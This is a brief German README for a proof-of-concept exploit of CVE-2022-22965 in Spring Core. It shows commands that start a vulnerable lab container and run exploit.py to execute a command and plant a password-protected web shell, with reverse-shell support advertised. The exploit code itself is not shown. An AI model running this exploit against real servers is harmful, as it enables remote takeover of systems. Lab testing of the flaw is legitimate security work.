
CVE-2022-22965 PoC inklusive Reverse-Shell-Unterstützung
CVE-2022-22965 PoC inklusive Reverse-Shell- und Passwortunterstützung. Fühl dich frei, mehr hinzuzufügen :)
$ docker run -p 9090:8080 vulfocus/spring-core-rce-2022-03-29 # run vulnerable docker
$ python3 exploit.py -c id --password 1234 --shell_name big0us
$ python3 exploit.py --help # for more usages
Ich habe den Code des ursprünglichen Exploits refaktoriert und einige Funktionen hinzugefügt.